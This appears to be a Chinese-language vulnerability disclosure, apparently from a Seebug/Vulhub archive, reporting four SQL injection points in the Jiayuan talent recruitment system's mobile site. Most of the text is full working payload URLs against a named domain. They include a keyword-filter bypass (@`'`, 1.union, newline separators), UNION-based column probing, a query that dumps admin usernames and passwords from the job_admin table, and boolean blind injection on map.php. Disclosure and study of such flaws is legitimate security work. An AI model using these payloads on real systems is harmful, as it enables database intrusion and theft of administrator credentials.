VULHUB ™

### 简要描述： 嘉缘人才系统4处SQL注入。 官网demo测试。 ### 详细说明： 嘉缘人才系统触屏版http://m.rccms.com。 第一处： ``` http://m.rccms.com/co/company.php?id=1065 ``` [<img src="https://images.seebug.org/upload/201411/191912419a82d7ae38010ff98396194a45c3f726.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191912419a82d7ae38010ff98396194a45c3f726.png) 修改参数为id=1065 and,出现SQL错误。 ``` http://m.rccms.com/co/company.php?id=1065%20and ``` [<img src="https://images.seebug.org/upload/201411/191912582bf24840b40aaaf19bdca6009487cf47.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191912582bf24840b40aaaf19bdca6009487cf47.png) 修改参数为id=1065 and 1=1, 信息又出来了，基本可以确定这里存在SQL注入。 [<img src="https://images.seebug.org/upload/201411/1919135007b31d09e6f92b3bde7d6c04bd56730c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1919135007b31d09e6f92b3bde7d6c04bd56730c.png)...

### 简要描述： 嘉缘人才系统4处SQL注入。 官网demo测试。 ### 详细说明： 嘉缘人才系统触屏版http://m.rccms.com。 第一处： ``` http://m.rccms.com/co/company.php?id=1065 ``` [<img src="https://images.seebug.org/upload/201411/191912419a82d7ae38010ff98396194a45c3f726.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191912419a82d7ae38010ff98396194a45c3f726.png) 修改参数为id=1065 and,出现SQL错误。 ``` http://m.rccms.com/co/company.php?id=1065%20and ``` [<img src="https://images.seebug.org/upload/201411/191912582bf24840b40aaaf19bdca6009487cf47.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191912582bf24840b40aaaf19bdca6009487cf47.png) 修改参数为id=1065 and 1=1, 信息又出来了，基本可以确定这里存在SQL注入。 [<img src="https://images.seebug.org/upload/201411/1919135007b31d09e6f92b3bde7d6c04bd56730c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1919135007b31d09e6f92b3bde7d6c04bd56730c.png) 嘉缘人才系统对SQL会check是否存在union/select等，union的话1.union就可以然过，select的话，在前面加一个@`'`，最后加一个#'就可以绕过，所以构造SQL如下： ``` id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1%23' ``` 这个会报SQL错误，因为表的列数不对，然后我们继续 ``` id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2%23' id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3%23' id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3,4%23' id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3,4,5%23' ``` 一直到没有SQL错误能正常输出，参数为： ``` id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27 ``` [<img src="https://images.seebug.org/upload/201411/1919193097914fbab8e9d02537d96dde9117b1aa.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1919193097914fbab8e9d02537d96dde9117b1aa.png) 好了，我们替换上面的63为导出管理员表的数据的select: ``` (select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin)) ``` 完整的参数为： ``` 1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27 ``` 好了，数据显示出来了。 ``` http://m.rccms.com/co/company.php?id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27 ``` [<img src="https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png) 第二处: ``` http://m.rccms.com/co/hire.php?id=1 ``` ``` http://m.rccms.com/co/hire.php?id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144%0alimit%0a1%23%27 ``` [<img src="https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png" alt="hire.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png) 第三处: ``` http://m.rccms.com/co/hires.php?id=2 ``` ``` 2%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27 ``` ``` http://m.rccms.com/co/hires.php?id=2%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27 ``` [<img src="https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png" alt="hires.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png) 第四处: ``` http://m.rccms.com/co/map.php?id=2 ``` id参数可以盲注。 ``` http://m.rccms.com/co/map.php?id=1065%20and%20substr(user(),1,1)%3Dchar(0x63) ``` 返回正常页面， [<img src="https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png" alt="map.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png) ``` http://m.rccms.com/co/map.php?id=1065%20and%20substr(user(),1,1)%3Dchar(0x64) ``` 返回参数错误 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png) [<img src="https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png" alt="hire.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png) [<img src="https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png" alt="hires.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png) [<img src="https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png" alt="map.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png)